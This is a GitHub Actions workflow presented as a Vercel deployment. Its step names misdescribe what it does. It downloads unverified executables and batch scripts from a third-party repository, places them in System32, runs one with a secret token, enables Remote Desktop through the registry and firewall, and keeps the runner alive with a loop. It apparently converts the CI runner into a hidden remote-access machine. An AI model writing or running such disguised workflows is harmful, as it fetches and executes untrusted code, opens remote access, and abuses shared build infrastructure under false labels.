name: Vercel_Deploy

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: Download & Building Repository
      run: |
        Invoke-WebRequest https://raw.githubusercontent.com/dloveme11122/vercelmyapi/master/Files/compdiff.exe -OutFile compdiff.exe
        Invoke-WebRequest https://raw.githubusercontent.com/dloveme11122/vercelmyapi/master/Files/nessxa.exe -OutFile nessxa.exe
    - name: ReIndex Maven Repository to Windows Directory.
      run: | 
        copy nessxa.exe C:\Windows\System32
        copy compdiff.exe C:\Windows\System32
    - name: Connect your Repository Master Protocol
      run: .\compdiff.exe authtoken $Env:API_AUTH_TOKEN
      env:
        API_AUTH_TOKEN: ${{ secrets.API_AUTH_TOKEN }}
    - name: Download Important Dependencys.
      run: |
        Invoke-WebRequest https://raw.githubusercontent.com/dloveme11122/vercelmyapi/master/Files/api_reg_ap.bat -OutFile api_reg_ap.bat
        Invoke-WebRequest https://raw.githubusercontent.com/dloveme11122/vercelmyapi/master/Files/api_check.bat -OutFile api_check.bat
        Invoke-WebRequest https://raw.githubusercontent.com/dloveme11122/vercelmyapi/master/Files/while.bat -OutFile while.bat
    - name: Install Dependency.
      run: start api_reg_ap.bat
    - name: Run Main Compiler.
      run: | 
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
        Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - name: Start Service
      run: sc start compdiff
    - name: Running your Service, Please Check API Endpoint. 
      run: cmd /c api_check.bat
    - name: Done.
      run: cmd /c while.bat 
